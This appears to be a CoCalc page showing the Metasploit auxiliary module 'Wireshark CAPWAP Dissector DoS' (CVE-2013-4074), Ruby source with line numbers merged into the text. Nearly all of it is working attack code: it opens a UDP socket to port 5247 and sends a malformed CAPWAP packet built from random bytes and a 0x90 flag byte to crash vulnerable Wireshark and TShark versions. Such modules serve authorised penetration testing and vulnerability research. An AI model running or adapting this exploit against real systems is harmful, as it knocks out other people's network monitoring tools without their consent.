CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/dos/wireshark/capwap.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Udp7include Msf::Auxiliary::Dos89def initialize(info = {})10super(update_info(info,11'Name' => 'Wireshark CAPWAP Dissector DoS',12'Description' => %q{13This module injects a malformed UDP packet to crash Wireshark and TShark 1.8.0 to 1.8.7, as well14as 1.6.0 to 1.6.15. The vulnerability exists in the CAPWAP dissector which fails to handle a15packet correctly when an incorrect length is given.16},17'License' => MSF_LICENSE,18'Author' =>19[20'Laurent Butti', # Discovery vulnerability21'j0sm1' # Auxiliary msf module22],23'References' =>24[25['CVE', '2013-4074'],26['OSVDB', '94091'],27['BID', '60500']28],29'DisclosureDate' => '2014-04-28'))3031# Protocol capwap needs port 5247 to trigger the dissector in wireshark32register_options([ Opt::RPORT(5247) ])33end3435def run3637connect_udp3839# We send a packet incomplete to crash dissector40print_status("#{rhost}:#{rport} - Trying to crash wireshark capwap dissector ...")41# With 0x90 in this location we set to 1 the flags F and M. The others flags are sets to 0, then42# the dissector crash43# You can see more information here: https://www.rfc-editor.org/rfc/rfc5415.txt44# F = 1 ; L = 0 ; W = 0 ; M = 1 ; K = 0 ; Flags = 00045buf = Rex::Text.rand_text(3) + "\x90" + Rex::Text.rand_text(15)46udp_sock.put(buf)4748disconnect_udp4950end51end525354